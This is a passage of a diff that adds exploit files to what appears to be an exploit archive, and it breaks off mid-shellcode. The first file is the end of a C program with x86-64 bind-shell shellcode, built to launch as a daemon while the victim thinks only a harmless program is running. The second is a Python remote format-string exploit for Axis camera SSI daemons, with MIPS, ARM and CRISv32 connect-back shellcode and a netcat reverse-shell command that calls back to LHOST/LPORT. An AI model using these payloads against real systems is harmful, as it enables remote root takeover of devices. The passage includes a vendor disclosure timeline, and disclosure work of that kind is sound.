re-connect. No re-execution of the program is required to reconnect for +//| CODE2 & CODE3. +//| +//| 3. Problem: I DoS'd the victim +//| 3. Answer: This probably was because you set the port range too broad. A broad port range +//| takes a lot of CPU power. I suggest keeping it to how many terminals you need. +//| + + + +#define PORT "\x11\x5a" // FORWARD BYTE ORDER +//| PORT: 4442 +#define PASSWORD "\x6c\x61\x20\x63\x72\x69\x70\x73" // FORWARD BYTE ORDER +//| PASSWORD = "la crips" + +//| ONLY CODE3 DOES NOT USE "PORT"; IT USES "LOW_PORT" & "HIGH_PORT" +#define HIGH_PORT "\x5f\x11" // REVERSE BYTE ORDER +#define LOW_PORT "\x5b\x11" // REVERSE BYTE ORDER +//| PORTS: 4443-4447 (remember 4443 doesn't count so 4444-4447) +//| (remember to use one terminal connection per open port) + +//|=====================!!!CHOSE ONLY ONE SHELLCODE!!!======================= +//| ========================================================================= +//| CODE1 The short bind shell (83 bytes) +//| ========================================================================= +//| This is the shortest bind-shell I could make. I leaned that mov byte takes +//| two bytes while Push+Pop takes 3 so I used more moves. Push+Pop is good if +//| you don't want to xor a register but your stack must be NULL on top. +//| This code only supports one terminal. + +unsigned char CODE1[] = //replace CODE1 for both CODEX <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< +"\x48\x31\xff\x48\xf7\xe7\x40\xb7\x02\x6a\x01\x5e\xb0\x29\x0f\x05\x48" +"\x97\x6a\x02\x66\xc7\x44\x24\x02"PORT"\x54\x5e\x52\xb2\x10\xb0\x31" +"\x0f\x05\x5e\xb0\x32\x0f\x05\xb0\x2b\x0f\x05\x40\x88\xc7\x40\xb6\x03" +"\xff\xce\xb0\x21\x0f\x05\x75\xf8\x48\x31\xf6\x48\xf7\xe6\x50\x48\xbb" +"\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"; + +//|=====================!!!CHOSE ONLY ONE SHELLCODE!!!======================= +//| ========================================================================= +//| CODE2 Persistent bind shell with a password (148 bytes) +//| ========================================================================= +//| Supports re-connecting after a disconnect (close terminal and open up again) +//| If you type in a password wrong, wait 60 seconds to reconnect. +//| If you close the terminal after you enter the correct password, you can +//| immediatly reconnect. +//| This code only supports one terminal. + + +unsigned char CODE2[] = //replace CODE2 for both CODEX <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< +"\x48\x31\xff\x48\xf7\xe7\x48\x31\xf6\x6a\x39\x58\x0f\x05\x48\x31\xff" +"\x48\x39\xf8\x74\x79\x48\x31\xff\x48\xf7\xe7\x40\xb7\x02\x6a\x01\x5e" +"\xb0\x29\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02"PORT"\x54\x5e" +"\x52\xb2\x10\xb0\x31\x0f\x05\x5e\xb0\x32\x0f\x05\xb0\x2b\x0f\x05\x40" +"\x88\xc7\x40\xb6\x03\xff\xce\xb0\x21\x0f\x05\x75\xf8\x48\x89\xc7\x48" +"\x89\xc6\x48\x8d\x74\x24\xf0\x6a\x10\x5a\x0f\x05\x48\xb8"PASSWORD"" +"\x48\x8d\x3e\x48\xaf\x74\x05\x6a\x3c\x58\x0f\x05\x48\x31\xf6\x48\xf7" +"\xe6\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b" +"\x0f\x05\xe9\x6c\xff\xff\xff"; + + +//|=====================!!!CHOSE ONLY ONE SHELLCODE!!!======================= +//| ========================================================================= +//| CODE3 Persistent bind shell with multi-port/terminal + password (177 bytes) +//| ========================================================================= +//| This bind shell has everything COD2 has to offer + more while only 29 bytes more +//| You will get as many terminals on the victim as your PORT-RANGE minus 1 +//| Your lowest port will NOT be open (so minus 1 port/terminal from your range) +//| Example: ports 4440-4445 = ports 4441-4445 usable = 5 terminals on victim + + +unsigned char CODE3[] = //replace CODE3 for both CODEX <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< +"\x48\x31\xf6\x56\x66\x68"HIGH_PORT"\x5b\x48\xff\xcb\x66\x81\xfb"LOW_PORT"" +"\x75\x06\x50\x66\x68"HIGH_PORT"\x5b\x48\x31\xff\x48\xf7\xe7\xb0\x39\x0f" +"\x05\x48\x31\xff\x48\x39\xf8\x74\x7b\x48\x31\xff\x48\xf7\xe7\x40\xb7\x02" +"\x6a\x01\x5e\xb0\x29\x0f\x05\x48\x97\x86\xdf\x6a\x02\x66\x89\x5c\x24\x02" +"\x86\xdf\x54\x5e\x52\xb2\x10\xb0\x31\x0f\x05\x5e\xb0\x32\x0f\x05\xb0\x2b" +"\x0f\x05\x40\x88\xc7\x40\xb6\x03\xff\xce\xb0\x21\x0f\x05\x75\xf8\x48\x89" +"\xc7\x48\x89\xc6\x48\x8d\x74\x24\xf0\x6a\x10\x5a\x0f\x05\x48\xb8"PASSWORD"" +"\x48\x8d\x3e\x48\xaf\x74\x05\x6a\x3c\x58\x0f\x05\x48\x31\xf6\x48\xf7\xe6" +"\x50\x48\xb9\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x51\x54\x5f\xb0\x3b\x0f\x05" +"\x48\x31\xff\x48\xf7\xe7\xe9\x58\xff\xff\xff"; + + + +//|========================== VOID SHELLCODE =========================== +void SHELLCODE() +{ +// This part floods the registers to make sure the shellcode will always run + __asm__("mov $0xAAAAAAAAAAAAAAAA, %rax\n\t" + "mov %rax, %rbx\n\t" "mov %rax, %rcx\n\t" "mov %rax, %rdx\n\t" + "mov %rax, %rsi\n\t" "mov %rax, %rdi\n\t" "mov %rax, %rbp\n\t" + "mov %rax, %r10\n\t" "mov %rax, %r11\n\t" "mov %rax, %r12\n\t" + "mov %rax, %r13\n\t" "mov %rax, %r14\n\t" "mov %rax, %r15\n\t" + "call CODE3"); //1st CODEX<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> +} + +//|========================== VOID printBytes =========================== +void printBytes() +{ +printf("The CripSlick's code is %d Bytes Long\n", + strlen(CODE3)); //2nd CODEX<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> +} + + +//|============================== Int main ================================ +int main () +{ + +// IMPORTANT> replace CODEX the "unsigned char" variable below +// > This needs to be done twice (for string count + code to use) + +int pid = fork(); // fork start + if(pid == 0){ // pid always starts at 0 + + SHELLCODE(); // launch void SHELLCODE + // this is to represent a scenario where you bind to a good program + // you always want your shellcode to run first + + }else if(pid > 0){ // pid will always be greater than 0 after the 1st process + // this argument will always be satisfied + + printBytes(); // launch printBYTES + // pretend that this is the one the victim thinks he is only using + } +return 0; // satisfy int main +system("exit"); // keeps our shellcode a daemon +} + diff --git a/platforms/multiple/remote/40125.py b/platforms/multiple/remote/40125.py new file mode 100755 index 000000000..dbd1bb711 --- /dev/null +++ b/platforms/multiple/remote/40125.py @@ -0,0 +1,1730 @@ +#!/usr/bin/env python2.7 +# +# [SOF] +# +# [Remote Format String Exploit] Axis Communications MPQT/PACS Server Side Include (SSI) Daemon +# Research and development by bashis 2016 +# +# This format string vulnerability has following characteristic: +# - Heap Based (Exploiting string located on the heap) +# - Blind Attack (No output the remote attacker)(*) +# - Remotly exploitable (As anonymous, no credentials needed) +# +# (*) Not so 'Blind' after all, since the needed addresses can be predicted by statistic. +# +# This exploit has following characteristic: +# - Multiple architecture exploit (MIPS/CRISv32/ARM) [From version 5.20.x] +# - Modifying LHOST/LPORT in shellcode on the fly +# - Manual exploiting of remote targets +# - Simple HTTPS support +# - Basic Authorization support (not needed for this exploit) +# - FMS dictionary and predicted addresses for GOT free() / BSS / Netcat shellcode +# - Multiple shellcodes (ARM, CRISv32, MIPS and Netcat PIPE shell) +# - Exploiting with MIPS, CRISv32 and ARM shellcode will give shell as root +# - Exploiting with ARM Netcat PIPE shell give normally shell as Anonymous (5.2x and 5.4x give shell as root) +# - Multiple FMS exploit techniques +# - "One-Write-Where-And-What" for MIPS and CRISv32 +# Using "Old Style" POP's +# Classic exploit using: Count to free() GOT, write shellcode address, jump to shellcode on free() call +# Shellcode loaded in memory by sending shellcode URL encoded, that SSI daemon decodes and keeps in memory. +# - "Two-Write-Where-And-What" for ARM +# 1) "Old Style": Writing 1x LSB and 1x MSB by using offsets for GOT free() target address +# 2) "New Style": ARM Arch's have both "Old Style" (>5.50.x) )POPs and "New Style" (<5.40.x) direct parameter access for POP/Write +# [Big differnce in possibilities between "Old Style" and "New Style", pretty interesting actually] +# - Another way to POP with "Old Style", to be able POPing with low as 1 byte (One byte with %1c instead of eight with %8x) +# - Exploit is quite well documented +# +# Anyhow, +# Everything started from this simple remote request: +# +# --- +# $ echo -en "GET /httpDisabled.shtml?&http_user=%p|%p HTTP/1.0\n\n" | netcat 192.168.0.90 80 +# HTTP/1.1 500 Server Error +# Content-Type: text/html; charset=ISO-8859-1 +# +# 500 Server Error +#

500 Server Error

+# The server encountered an internal error and could not complete your request. +# +# --- +# +# Which gave this output in /var/log/messages on the remote device: +# +# --- +# Jan 1 16:05:06 axis /bin/ssid[3110]: ssid.c:635: getpwnam() failed for user: 0x961f0|0x3ac04b10 +# Jan 1 16:05:06 axis /bin/ssid[3110]: ssid.c:303: Failed to get authorization data. +# --- +# +# Which resulted into an remote exploit for more than 200 unique Axis Communication MPQT/PACS products +# +# --- +# $ netcat -vvlp 31337 +# listening on [any] 31337 ... +# 192.168.0.90: inverse host lookup failed: Unknown host +# connect to [192.168.0.1] from (UNKNOWN) [192.168.0.90] 55738 +# id +# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),6(disk),10(wheel),51(viewer),52(operator),53(admin),54(system),55(ptz) +# pwd +# /usr/html +# --- +# +# Some technical notes: +# +# 1. Direct addressing with %$%n is "delayed", and comes in force only after disconnect. +# Old metod with POP's coming into force instantly +# +# 2. Argument "0" will be assigned (after using old POP metod and %n WRITE) the next address on stack after POP's) +# - Would be interesting to investigate why. +# +# 3. Normal Apache badbytes: 0x00, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x20, 0x23, 0x26 +# Goodbytes: 0x01-0x08, 0x0e-0x1f, 0x21-0x22, 0x24-0x25, 0x27-0xff +# +# 3.1 Normal Boa badbytes: 0x00-0x08, 0x0b-0x0c, 0x0e-0x19, 0x80-0xff +# Goodbytes: 0x09, 0x0a, 0x0d, 0x20-0x7f +# +# 3.2 Apache and Boa, by using URL encoded shellcode as in this exploit: +# Badbytes = None, Goodbytes = 0x00 - 0xff (Yay!) +# +# 4. Everything is randomized, except heap. +# +# 5. My initial attempts to use ROP's was not good, as I didn't want to create +# one unique FMS key by testing each single firmware version, and using ROP with FMS +# on heap seems pretty complicated as there is one jump availible, maximum two. +# +# 5.1 Classic GOT write for free() that will jump to shellcode, was the best technique in this case. +# +# 6. Encoded and Decoded shellcode located in .bss section. +# 6.1 FMS excecuted on heap +# +# 7. Vulnerable MPQT/PACS architectures: CRISv32, MIPS and ARM +# 7.1 ARM has nonexecutable stack flag bit set (>5.20.x) by default on their binaries/libs, +# so execute shellcode on heap/stack may be impossible. +# 7.2 ARM shellcode and exploit has been verified by setting executable stack flag bit on binaries, +# and re-compile of the image. +# 7.3 However, ARM is easily exploitable with netcat shell, that's using the builtin '/bin/sh -c' code to execute. +# +# 8. This exploit are pretty well documented, more details can be extracted by reading +# the code and comments. +# +# MIPS ssid maps +# 00400000-0040d000 r-xp 00000000 00:01 2272 /bin/ssid +# 0041d000-0041e000 rw-p 0000d000 00:01 2272 /bin/ssid +# 0041e000-00445000 rwxp 00000000 00:00 0 [heap] +# +# ARM ssid maps +# 00008000-00014000 r-xp 00000000 00:01 2055 /bin/ssid +# 0001c000-0001d000 rw-p 0000c000 00:01 2055 /bin/ssid +# 0001d000-00044000 rw-p 00000000 00:00 0 [heap] +# +# Crisv32 ssid maps +# 00080000-0008c000 r-xp 00000000 1f:03 115 /bin/ssid +# 0008c000-0008e000 rw-p 0000a000 1f:03 115 /bin/ssid +# 0008e000-000b6000 rwxp 0008e000 00:00 0 [heap] +# +# General notes: +# +# When the vul daemon process is exploited, and after popping root connect-back shell, +# the main process are usally restarted by respawnd, after the shell have spawned and taken over the parent process, +# when the main process are fully alive again, I can enjoy the shell, and everybody else can +# enjoy of the camera - that should make all of us happy ;) +# During exploiting, logs says almost nothing, only that the main process restarted. +# Note: Not true with ARM Netcat PIPE shell (as the code will vfork() and wait until child exits) +# +# '&http_user=' is the vuln tag, and the FMS will be excecuted when it will try to do vsyslog(), +# after ssid cannot verify the user, free() are the closest function to be called after +# vsyslog(), needed and perfect to use for jumping. +# There is nothing shown for remote user, possible output of FMS are _only_ shown in log/console. +# So we are pretty blind, but due to fixed FMS keys, that doesn't matter for us - it's predictable by statistics. +# +# Quite surprised to see so many different devices and under one major release version, +# that's covered by one "FMS key". The "FMS key" are valid for all minor versions under the major version. +# +# This made me start thinking how brilliant and clever it would be to make an sophisticated door that's using format string as backdoor, +# which generates no FMS output whatsoever to attacker and unlocked by a 'FMS key', instead of using hardcoded login/password. +# +# - No hardcoded login/password that could easily be found in firmware/software files. +# - Extremely hard to find without local access (and find out what to trigger for opening the door) +# - Nobody can not actually prove it is a sophisticated door for sure. "It's just another bug.. sorry! - here is the fixed version." +# (Only to close this door, and open another door, somewhere else, in any binary - and try make it harder to find) +# +# Note: +# I don't say that Axis Communication has made this hidden format string by this purpose. +# I can only believe it was a really stupid mistake from Axis side, after I have seen one screen-dump of the CVS changelog of SSI Daemon, +# and another screen-dump with the change made late 2009, from non-vulnerable to vulnerable, in the affected code of logerr(). +# +# Vulnerable and exploitable products +# +# A1001, A8004-VE, A9188, C3003, F34, F41, F44, M1124, M1124-E, M1125, M1125-E, M1145, M1145-L, M3006, +# M3007, M3026, M3027, M3037, M7010, M7011, M7014, M7016, P1125, P1353, P1354, P1355, P1357, P1364, +# P1365, P1405, P1405-E, P1405-LE, P1425-E, P1425-LE, P1427, P1427-E, P1435, P3214, P3214-V, P3215, +# P3215-V, P3224, P3224-LVE, P3225-LV, P3353, P3354, P3363, P3364, P3364-L, P3365, P3367, P3384, +# P3707-PE, P3904, P3904-R, P3905, P3915-R, P5414-E, P5415-E, P5514, P5514-E, P5515, P5515-E, P5624, +# P5624-E, P5635-E, P7210, P7214, P7216, P7224, P8535, Q1602, Q1604, Q1614, Q1615, Q1635, Q1635-E, +# Q1765-LE, Q1765-LE-PT, Q1775, Q1931-E, Q1931-E-PT, Q1932-E, Q1932-E-PT, Q1941-E, Q2901-E, Q2901-E-PT, +# Q3504, Q3505, Q6000-E, Q6042, Q6042-C, Q6042-E, Q6042-S, Q6044, Q6044-C, Q6044-E, Q6044-S, Q6045, +# Q6045-C, Q6045-E, Q6045-S, Q6114-E, Q6115-E, Q7411, Q7424-R, Q7436, Q8414, Q8414-LVS, Q8631-E, Q8632-E, +# Q8665-E, Q8665-LE, V5914, V5915, M1054, M1103, M1104, M1113, M1114, M2014-E, M3014, M3113, M3114, M3203, +# M3204, M5013, M5014, M7001, P12/M20, P1204, P1214, P1214-E, P1224-E, P1343, P1344, P1346, P1347, P2014-E, +# P3301, P3304, P3343, P3344, P3346, P3346-E, P5512, P5512-E, P5522, P5522-E, P5532, P5532-E, P5534, P5534-E, +# P5544, P8221, P8513, P8514, P8524, Q1755, Q1910, Q1921, Q1922, Q6032, Q6032-C, Q6032-E, Q6034, Q6034-C, +# Q6034-E, Q6035, Q6035-C, Q6035-E, Q7401, Q7404, Q7406, Q7414, Q8721-E, Q8722-E, C, M1004-W, M1011, M1011-W, +# M1013, M1014, M1025, M1031-W, M1033-W, M1034-W, M1143-L, M1144-L, M3004, M3005, M3011, M3024, M3024-L, +# M3025, M3044-V, M3045-V, M3046-V, P1311, P1428-E, P7701, Q3709-PVE, Q3708-PVE, Q6128-E... and more +# +# http://origin-www.axis.com/ftp/pub_soft/MPQT/SR/service-releases.txt +# +# Firmware versions vulnerable to the SSI FMS exploit +# +# ('V.Vx' == The FMS key used in this exploit) +# +# Firmware Introduced CRISv32 MIPS ARM (no exec heap from >5.20.x) +# 5.00.x 2008 - - no +# 5.01.x 2008 no - no +# 5.02.x 2008 no - - +# 5.05.x 2009 no - - +# 5.06.x 2009 no - - +# 5.07.x 2009 no - no +# 5.08.x 2010 no - - +# 5.09.x 2010 no - - +# 5.10.x 2009 no - - +# 5.11.x 2010 no - - +# 5.12.x 2010 no - - +# 5.15.x 2010 no - - +# 5.16.x 2010 no - - +# 5.20.x 2010-2011 5.2x - 5.2x +# 5.21.x 2011 5.2x - 5.2x +# 5.22.x 2011 5.2x - - +# 5.25.x 2011 5.2x - - +# 5.40.x 2011 5.4x 5.4x 5.4x +# 5.41.x 2012 5.4x - - +# 5.50.x 2013 5.5x 5.5x 5.4x +# 5.51.x 2013 - 5.4x - +# 5.55.x 2013 - 5.5x 5.5x +# 5.60.x 2014 - 5.6x 5.6x +# 5.65.x 2014-2015 - 5.6x - +# 5.70.x 2015 - 5.7x - +# 5.75.x 2015 - 5.7x 5.7x +# 5.80.x 2015 - 5.8x 5.8x +# 5.81.x 2015 - 5.8x - +# 5.85.x 2015 - 5.8x 5.8x +# 5.90.x 2015 - 5.9x - +# 5.95.x 2016 - 5.9x 5.8x +# 6.10.x 2016 - 6.1x - +# 6.15.x 2016 - - 6.1x +# 6.20.x 2016 - 6.2x - +# +# Vendor URL's of still supported and affected products +# +# http://www.axis.com/global/en/products/access-control +# http://www.axis.com/global/en/products/video-encoders +# http://www.axis.com/global/en/products/network-cameras +# http://www.axis.com/global/en/products/audio +# +# Axis Product Security +# +# product-security@axis.com +# http://www.axis.com/global/en/support/product-security +# http://origin-www.axis.com/ftp/pub_soft/MPQT/SR/service-releases.txt +# http://www.axis.com/global/en/support/faq/FAQ116268 +# +# Timetable +# +# - Research and Development: 06/01/2016 - 01/06/2016 +# - Sent vulnerability details to vendor: 05/06/2016 +# - Vendor responce received: 06/06/2016 +# - Vendor ACK of findings received: 07/06/2016 +# - Vendor sent verification image: 13/06/2016 +# - Confirmed that exploit do not work after vendors correction: 13/06/2016 +# - Vendor informed about their service release(s): 29/06/2016 +# - Sent vendor a copy of the (this) PoC exploit: 29/06/2016 +# - Full Disclosure: 18/07/2016 +# +# Quote of the day: Never say "whoops! :o", always say "Ah, still interesting! :>" +# +# Have a nice day +# /bashis +# +##################################################################################### + +import sys +import string +import socket +import time +import argparse +import urllib, urllib2, httplib +import base64 +import ssl +import re + + +class do_FMS: + +# POP = "%8x" # Old style POP's with 8 bytes per POP + POP = "%1c" # Old style POP's with 1 byte per POP + WRITElln = "%lln" # Write 8 bytes + WRITEn = "%n" # Write 4 bytes + WRITEhn = "%hn" # Write 2 bytes + WRITEhhn = "%hhn" # Write 1 byte + + def __init__(self,targetIP,verbose): + self.targetIP = targetIP + self.verbose = verbose + self.fmscode = "" + + # Mostly used internally in this function + def Add(self, data): + self.fmscode += data + + # 'New Style' Double word (8 bytes) + def AddDirectParameterLLN(self, ADDR): + self.Add('%') + self.Add(str(ADDR)) + self.Add('$lln') + + # 'New Style' Word (4 bytes) + def AddDirectParameterN(self, ADDR): + self.Add('%') + self.Add(str(ADDR)) + self.Add('$n') + + # 'New Style' Half word (2 bytes) + def AddDirectParameterHN(self, ADDR): + self.Add('%') + self.Add(str(ADDR)) + self.Add('$hn') + + # 'New Style' One Byte (1 byte) + def AddDirectParameterHHN(self, ADDR): + self.Add('%') + self.Add(str(ADDR)) + self.Add('$hhn') + + # Addressing + def AddADDR(self, ADDR): + self.Add('%') + self.Add(str(ADDR)) + self.Add('u') + + # 'Old Style' POP + def AddPOP(self, size): + if size != 0: + self.Add(self.POP * size) + + # Normally only one will be sent, multiple is good to quick-check for any FMS + # + # 'Old Style' Double word (8 bytes) + def AddWRITElln(self, size): + self.Add(self.WRITElln * size) + + # 'Old Style' Word (4 bytes) + def AddWRITEn(self, size): + self.Add(self.WRITEn * size) + + # 'Old Style' Half word (2 bytes) + def AddWRITEhn(self, size): + self.Add(self.WRITEhn * size) + + # 'Old Style' One byte (1 byte) + def AddWRITEhhn(self, size): + self.Add(self.WRITEhhn * size) + + # Return the whole FMS string + def FMSbuild(self): + return self.fmscode + +class HTTPconnect: + + def __init__(self, host, proto, verbose, creds, noexploit): + self.host = host + self.proto = proto + self.verbose = verbose + self.credentials = creds + self.noexploit = noexploit + + # Netcat remote connectback shell needs to have raw HTTP connection as we using special characters as '\t','$','`' etc.. + def RAW(self, uri): + # Connect-timeout in seconds + timeout = 5 + socket.setdefaulttimeout(timeout) + + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + tmp = self.host.split(':') + HOST = tmp[0] + PORT = int(tmp[1]) + if self.verbose: + print "[Verbose] Sending to:", HOST + print "[Verbose] Port:", PORT + print "[Verbose] URI:",uri + s.connect((HOST, PORT)) + s.send("GET %s HTTP/1.0\r\n\r\n" % uri) + html = (s.recv(4096)) # We really do not care whats coming back +# if html: +# print "[i] Received:",html + s.shutdown(3) + s.close() + return html + + + def Send(self, uri): + + # The SSI daemon are looking for this, and opens a new FD (5), but this does'nt actually + # matter for the functionality of this exploit, only for future references. + headers = { + 'User-Agent' : 'MSIE', + } + + # Connect-timeout in seconds + timeout = 5 + socket.setdefaulttimeout(timeout) + + url = '%s://%s%s' % (self.proto, self.host, uri) + + if self.verbose: + print "[Verbose] Sending:", url + + if self.proto == 'https': + if hasattr(ssl, '_create_unverified_context'): + print "[i] Creating SSL Default Context" + ssl._create_default_https_context = ssl._create_unverified_context + + if self.credentials: + Basic_Auth = self.credentials.split(':') + if self.verbose: + print "[Verbose] User:",Basic_Auth[0],"Password:",Basic_Auth[1] + try: + pwd_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm() + pwd_mgr.add_password(None, url, Basic_Auth[0], Basic_Auth[1]) + auth_handler = urllib2.HTTPBasicAuthHandler(pwd_mgr) + opener = urllib2.build_opener(auth_handler) + urllib2.install_opener(opener) + except Exception as e: + print "[!] Basic Auth Error:",e + sys.exit(1) + + if self.noexploit and not self.verbose: + print "[<] 204 Not Sending!" + html = "Not sending any data" + else: + data = None + req = urllib2.Request(url, data, headers) + rsp = urllib2.urlopen(req) + if rsp: + print "[<] %s OK" % rsp.code + html = rsp.read() + return html + + +class shellcode_db: + + def __init__(self,targetIP,verbose): + self.targetIP = targetIP + self.verbose = verbose + + def sc(self,target): + self.target = target + + +# Connect back shellcode +# +# CRISv32: Written by myself, no shellcode availible out on "The Internet" +# NCSH: My PoC of netcat FIFO / PIPE reverese shell, w/o '-e' option and with $IFS as separators +# MIPSel: Written by Jacob Holcomb (url encoded by me) +# ARM: http://shell-storm.org/shellcode/files/shellcode-754.php +# + # Slightly modified syscall's + MIPSel = string.join([ + #close stdin + "%ff%ff%04%28" #slti a0,zero,-1 + "%a6%0f%02%24" #li v0,4006 + "%4c%f7%f7%03" #syscall 0xdfdfd + #close stdout + "%11%11%04%28" #slti a0,zero,4369 + "%a6%0f%02%24" #li v0,4006 + "%4c%f7%f7%03" #syscall 0xdfdfd + #close stderr + "%fd%ff%0c%24" #li t4,-3 + "%27%20%80%01" #nor a0,t4,zero + "%a6%0f%02%24" #li v0,4006 + "%4c%f7%f7%03" #syscall 0xdfdfd + # socket AF_INET (2) + "%fd%ff%0c%24" #li t4,-3 + "%27%20%80%01" #nor a0,t4,zero + "%27%28%80%01" #nor a1,t4,zero + "%ff%ff%06%28" #slti a2,zero,-1 + "%57%10%02%24" #li v0,4183 + "%4c%f7%f7%03" #syscall 0xdfdfd + # + "%ff%ff%44%30" # andi $a0, $v0, 0xFFFF + # + # dup2 stdout + "%c9%0f%02%24" #li v0,4041 + "%4c%f7%f7%03" #syscall 0xdfdfd + # + # dup2 stderr + "%c9%0f%02%24" #li v0,4041 + "%4c%f7%f7%03" #syscall 0xdfdfd + # + # Port + "PP1PP0%05%3c" + "%01%ff%a5%34" + # + "%01%01%a5%20" #addi a1,a1,257 + "%f8%ff%a5%af" #sw a1,-8(sp) + # + # IP + "IP3IP4%05%3c" + "IP1IP2%a5%34" + # + "%fc%ff%a5%af" #sw a1,-4(sp) + "%f8%ff%a5%23" #addi a1,sp,-8 + "%ef%ff%0c%24" #li t4,-17 + "%27%30%80%01" #nor a2,t4,zero + "%4a%10%02%24" #li v0,4170 + "%4c%f7%f7%03" #syscall 0xdfdfd + # + "%62%69%08%3c" #lui t0,0x6962 + "%2f%2f%08%35" #ori t0,t0,0x2f2f + "%ec%ff%a8%af" #sw t0,-20(sp) + "%73%68%08%3c" #lui t0,0x6873 + "%6e%2f%08%35" #ori t0,t0,0x2f6e + "%f0%ff%a8%af" #sw t0,-16(sp + "%ff%ff%07%28" #slti a3,zero,-1 + "%f4%ff%a7%af" #sw a3,-12(sp) + "%fc%ff%a7%af" #sw a3,-4(sp + "%ec%ff%a4%23" #addi a0,sp,-20 + "%ec%ff%a8%23" #addi t0,sp,-20 + "%f8%ff%a8%af" #sw t0,-8(sp) + "%f8%ff%a5%23" #addi a1,sp,-8 + "%ec%ff%bd%27" #addiu sp,sp,-20 + "%ff%ff%06%28" #slti a2,zero,-1 + "%ab%0f%02%24" #li v0,4011 (execve) + "%4c%f7%f7%03" #syscall 0xdfdfd + ], '') + + # Working netcat shell + # - $PATH will locate 'mkfifo', 'nc' and 'rm' + # - LHOST / LPORT will be changed on the fly later in the code + # - 1) make FIFO, 2) netcat back to attacker with STDIN to /bin/sh, and PIPE STDOUT back to the remote via FIFO, 3) remove FIFO when exiting + # - $IFS = [By default, and we need or as separator] + # $ echo -n "$IFS" | hexdump -C + # 00000000 20 09 0a + # - $PS1 = $ [By default, and we need something to "comment" out our trailing FMS code from /bin/sh -c] + # + # '2>/tmp/s' (STDERR > FIFO) Don't work with $IFS as separator + # + # Working with Apache and Boa +# NCSH = "mkfifo$IFS/tmp/s;nc$IFS-w$IFS\"5\"$IFS\"LHOST\"$IFS\"LPORT\"$IFS0/tmp/s\"$IFS\"2>/tmp/s;rm$IFS/tmp/s;$PS1" + NCSH = "mkfifo$IFS/tmp/s;nc$IFS-w$IFS\"5\"$IFS\"LHOST\"$IFS\"LPORT\"$IFS0/tmp/s;rm$IFS/tmp/s;$PS1" + + ARMel = string.join([ + # original: http://shell-storm.org/shellcode/files/shellcode-754.php + # 32-bit instructions, enter thumb mode + "%01%10%8f%e2" # add r1, pc, #1 + "%11%ff%2f%e1" # bx r1 + + # 16-bit thumb instructions follow + # + # socket(2, 1, 0) + "%02%20" #mov r0, #2 + "%01%21" #mov r1, #1 + "%92%1a" #sub r2, r2, r2 + "%0f%02" #lsl r7, r1, #8 + "%19%37" #add r7, r7, #25 + "%01%df" #svc 1 + # + # connect(r0, &addr, 16) + "%06%1c" #mov r6, r0 + "%08%a1" #add r1, pc, #32 + "%10%22" #mov r2, #16 + "%02%37" #add r7, #2 + "%01%df" #svc 1 + # + # dup2(r0, 0/1/2) + "%3f%27" #mov r7, #63 + "%02%21" #mov r1, #2 + # + #lb: + "%30%1c" #mov r0, r6 + "%01%df" #svc 1 + "%01%39" #sub r1, #1 + "%fb%d5" #bpl lb + # + # execve("/bin/sh", ["/bin/sh", 0], 0) + "%05%a0" #add r0, pc, #20 + "%92%1a" #sub r2, r2, r2 + "%05%b4" #push {r0, r2} + "%69%46" #mov r1, sp + "%0b%27" #mov r7, #11 + "%01%df" #svc 1 + # + "%c0%46" # .align 2 (NOP) + "%02%00" # .short 0x2 (struct sockaddr) + "PP1PP0" # .short 0x3412 (port: 0x1234) + "IP1IP2IP3IP4" #.byte 192,168,57,1 (ip: 192.168.57.1) + # .ascii "/bin/sh\0\0" + "%2f%62%69%6e" # /bin + "%2f%73%68%00%00" # /sh\x00\x00 + "%00%00%00%00" + "%c0%46" + ], '') + + + # Connect-back shell for Axis CRISv32 + # Written by mcw noemail eu 2016 + # + CRISv32 = string.join([ + #close(0) + "%7a%86" # clear.d r10 + "%5f%9c%06%00" # movu.w 0x6,r9 + "%3d%e9" # break 13 + #close(1) + "%41%a2" # moveq 1,r10 + "%5f%9c%06%00" # movu.w 0x6,r9 + "%3d%e9" # break 13 + #close(2) + "%42%a2" # moveq 2,r10 + "%5f%9c%06%00" # movu.w 0x6,r9 + "%3d%e9" # break 13 + # + "%10%e1" # addoq 16,sp,acr + "%42%92" # moveq 2,r9 + "%df%9b" # move.w r9,[acr] + "%10%e1" # addoq 16,sp,acr + "%02%f2" # addq 2,acr + #PORT + "%5f%9ePP1PP0" # move.w 0xPP1PP0,r9 # + "%df%9b" # move.w r9,[acr] + "%10%e1" # addoq 16,sp,acr + "%6f%96" # move.d acr,r9 + "%04%92" # addq 4,r9 + #IP + "%6f%feIP1IP2IP3IP4" # move.d IP4IP3IP2IP1,acr + "%e9%fb" # move.d acr,[r9] + # + #socket() + "%42%a2" # moveq 2,r10 + "%41%b2" # moveq 1,r11 + "%7c%86" # clear.d r12 + "%6e%96" # move.d $sp,$r9 + "%e9%af" # move.d $r10,[$r9+] + "%e9%bf" # move.d $r11,[$r9+] + "%e9%cf" # move.d $r12,[$r9+] + "%41%a2" # moveq 1,$r10 + "%6e%b6" # move.d $sp,$r11 + "%5f%9c%66%00" # movu.w 0x66,$r9 + "%3d%e9" # break 13 + # + "%6a%96" # move.d $r10,$r9 + "%0c%e1" # addoq 12,$sp,$acr + "%ef%9b" # move.d $r9,[$acr] + "%0c%e1" # addoq 12,$sp,$acr + "%6e%96" # move.d $sp,$r9 + "%10%92" # addq 16,$r9 + "%6f%aa" # move.d [$acr],$r10 + "%69%b6" # move.d $r9,$r11 + "%50%c2" # moveq 16,$r12 + # + # connect() + "%6e%96" # move.d $sp,$r9 + "%e9%af" # move.d $r10,[$r9+] + "%e9%bf" # move.d 